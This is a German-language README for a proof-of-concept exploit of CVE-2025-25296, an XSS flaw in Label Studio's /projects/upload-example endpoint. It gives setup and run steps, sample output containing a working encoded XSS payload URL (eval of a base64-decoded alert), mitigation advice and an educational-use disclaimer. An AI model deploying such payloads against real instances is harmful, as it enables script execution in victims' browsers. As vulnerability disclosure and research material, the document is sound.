
Proof of Concept (POC) for the CVE-2025-25296 vulnerability affecting Label Studio versions prior to 1.16.0
Dieses Projekt demonstriert einen Proof of Concept (POC) für die Schwachstelle CVE-2025-25296, die Label Studio betrifft, ein Open-Source-Tool zur Datenbeschriftung. Die Schwachstelle befindet sich im Endpunkt /projects/upload-example, der die von Benutzern bereitgestellten HTML-Inhalte in GET-Anfragen nicht bereinigt. Dadurch können Angreifer beliebiges JavaScript im Browser des Opfers ausführen, was zu potenziellen Cross-Site-Scripting-Angriffen (XSS) führt.
/projects/upload-example von Label Studio1.16.0 oder neuerAls temporärer Workaround:
/projects/upload-example nicht mit GET-Anfragen.pip mit setup.sh)poc.py: Python-Skript zum Ausnutzen der Schwachstelle und zum Demonstrieren des XSS-Angriffs.setup.sh: Skript zum Einrichten der verwundbaren Umgebung mit Docker.Klonen Sie dieses Repository:
git clone CVE-2025-25296-POC
cd CVE-2025-25296-POC
Führen Sie das Setup-Skript aus:
chmod +x setup.sh
./setup.sh
Das Setup-Skript wird Folgendes tun:
1.15.0) pullen.localhost:8080 ausführen.Führen Sie das Exploit-Skript aus:
python poc.py
Das Skript wird Folgendes tun:
/projects/upload-example senden.Öffnen Sie die bereitgestellte URL in einem Webbrowser, um den durch den Payload ausgelösten XSS-Alert zu beobachten.
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E
Zur Entschärfung dieser Schwachstelle:
1.16.0 oder neuer.Dieses Projekt dient ausschließlich Bildungs- und Forschungszwecken. Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine ausdrückliche Genehmigung haben. Die unbefugte Verwendung dieses Tools kann gegen geltende Gesetze verstoßen.